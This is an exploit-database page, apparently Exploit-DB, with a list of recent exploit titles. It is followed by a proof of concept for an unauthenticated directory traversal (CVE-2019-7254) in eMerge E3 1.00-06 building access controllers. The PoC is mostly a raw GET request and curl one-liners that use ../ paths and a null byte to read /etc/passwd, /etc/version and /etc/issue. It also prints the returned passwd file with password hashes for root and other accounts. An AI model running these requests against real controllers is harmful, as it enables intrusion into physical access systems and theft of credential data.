
38 changes to exploits/shellcodes Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH) Wondershare Application Framework Service - _WsAppService_ Unquote Service Path eMerge E3 Access Controller 4.6.07 - Remote Code Execution eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit) CBAS-Web 19.0.0 - Information Disclosure Prima FlexAir Access Control 2.3.38 - Remote Code Execution Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting eMerge E3 1.00-06 - Unauthenticated Directory Traversal eMerge E3 1.00-06 - Privilege Escalation eMerge E3 1.00-06 - Remote Code Execution eMerge E3 1.00-06 - Cross-Site Request Forgery Atlassian Confluence 6.15.1 - Directory Traversal eMerge E3 1.00-06 - Arbitrary File Upload eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting eMerge50P 5000P 4.6.07 - Remote Code Execution CBAS-Web 19.0.0 - Remote Code Execution CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin) CBAS-Web 19.0.0 - Username Enumeration CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection Joomla 3.9.13 - 'Host' Header Injection Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting Prima Access Control 2.3.35 - Arbitrary File Upload Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit) Optergy 2.3.0a - Remote Code Execution FlexAir Access Control 2.4.9api3 - Remote Code Execution Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin) Optergy 2.3.0a - Username Disclosure Optergy 2.3.0a - Remote Code Execution (Backdoor) Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting FlexAir Access Control 2.3.35 - Authentication Bypass Bematech Printer MP-4200 - Denial of Service
42 lines
No EOL
1.7 KiB
Text
42 lines
No EOL
1.7 KiB
Text
# Exploit Title: eMerge E3 1.00-06 - Unauthenticated Directory Traversal
|
|
# Google Dork: NA
|
|
# Date: 2018-09-11
|
|
# Exploit Author: LiquidWorm
|
|
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
|
|
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
|
|
# Version: 1.00-06
|
|
# Tested on: NA
|
|
# CVE : CVE-2019-7254
|
|
# Advisory: https://applied-risk.com/resources/ar-2019-009
|
|
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
|
|
# Advisory: https://applied-risk.com/resources/ar-2019-005
|
|
|
|
# PoC
|
|
|
|
GET /?c=../../../../../../etc/passwd%00
|
|
Host: 192.168.1.2
|
|
|
|
root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh
|
|
bin:x:1:1:bin:/bin:
|
|
daemon:x:2:2:daemon:/sbin:
|
|
adm:x:3:4:adm:/var/adm:
|
|
lp:x:4:7:lp:/var/spool/lpd:
|
|
sync:x:5:0:sync:/sbin:/bin/sync
|
|
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
|
|
halt:x:7:0:halt:/sbin:/sbin/halt
|
|
mail:x:8:12:mail:/var/spool/mail:
|
|
news:x:9:13:news:/var/spool/news:
|
|
uucp:x:10:14:uucp:/var/spool/uucp:
|
|
operator:x:11:0:operator:/root:
|
|
games:x:12:100:games:/usr/games:
|
|
gopher:x:13:30:gopher:/usr/lib/gopher-data:
|
|
ftp:x:14:50:FTP User:/home/ftp:
|
|
nobody:x:99:99:Nobody:/home/default:
|
|
e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh
|
|
lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh
|
|
|
|
|
|
curl -s http://192.168.1.3/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
|
|
curl -s http://192.168.1.2/badging/badge_template_print.php?tpl=../../../../../etc/version
|
|
curl -s http://192.168.1.2/badging/badge_template_v0.php?layout=../../../../../../../etc/issue
|
|
curl -s http://192.168.1.2/?c=../../../../../../etc/passwd%00 |